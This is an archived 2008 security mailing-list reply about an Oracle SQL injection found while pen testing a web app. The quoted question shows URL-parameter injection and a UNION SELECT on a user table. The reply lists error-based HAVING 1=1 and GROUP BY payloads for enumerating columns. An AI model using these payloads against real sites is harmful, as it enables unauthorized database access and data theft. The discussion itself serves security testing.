Re: Oracle URL SQL Injection issue

From: Jason Thompson (securitux@gmail.com)
Date: Fri Jan 18 2008 - 14:19:49 EST

• Next message: Campbell Murray: "Re: http TRACE option"
• Previous message: Florencio Cano: "Re: http TRACE option"
• In reply to: Clone: "Oracle URL SQL Injection issue"
• Next in thread: Francois Larouche: "Re: Oracle URL SQL Injection issue"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Did you try HAVING 1=1? I use that all the time.

From: http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/

Finding Column Names with HAVING BY - Error Based (S)

In the same order,

    * ' HAVING 1=1 --
    * ' GROUP BY table.columnfromerror1 HAVING 1=1 --
    * ' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
    * ' GROUP BY table.columnfromerror1, columnfromerror2,
columnfromerror(n) HAVING 1=1 -- and so on
    * If you are not getting any more error then it's done.

I've rarely seen UNION SELECT work except in some cases... tables have
to be structured a certain way bc of how UNION works.

-J

On Jan 17, 2008 7:21 PM, Clone <c70n3@yahoo.co.in> wrote:
> Hey List
>
> I am pen testing a web app that supplies sql
> parameters on the URL something like
>
> http://x.y.z.a/item.php?Id=90
>
> I did blind sql injection by adding AND 1=1 to confirm
> the vulnerability.
>
> Now when I do
>
> http://x.y.z.a/item.php?Id=90'
>
> I get
>
> ociparse() [function.ociparse]: OCIParse: ORA-01756:
> quoted string not properly terminated in item.php on
> line 312
>
> Then I tried (after confirming presence of usr table
> name)
>
> http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20*%20from%20usr;--
>
> and I get the error
>
> ociexecute() [function.ociexecute]: OCIStmtExecute:
> ORA-01789: query block has incorrect number of result
> columns in dbs.inc on line 44
>
> I know one valid user account in the oracle DB.
>
> Any idea what's the best strategy to move forward?
>
> I'm not getting any further from here so far.
>
> Any advise / helpo would be much appreciated.
>
> Cheers'
>
>
>
> 5, 50, 500, 5000 - Store N number of mails in your inbox. Go to http://help.yahoo.com/l/in/yahoo/mail/yahoomail/tools/tools-08.html
>
>
> ------------------------------------------------------------------------
> This list is sponsored by: Cenzic
>
> Need to secure your web apps NOW?
> Cenzic finds more, "real" vulnerabilities fast.
> Click to try it, buy it or download a solution FREE today!
>
> http://www.cenzic.com/downloads
> ------------------------------------------------------------------------
>
>

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------

• Next message: Campbell Murray: "Re: http TRACE option"
• Previous message: Florencio Cano: "Re: http TRACE option"
• In reply to: Clone: "Oracle URL SQL Injection issue"
• Next in thread: Francois Larouche: "Re: Oracle URL SQL Injection issue"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:20 EDT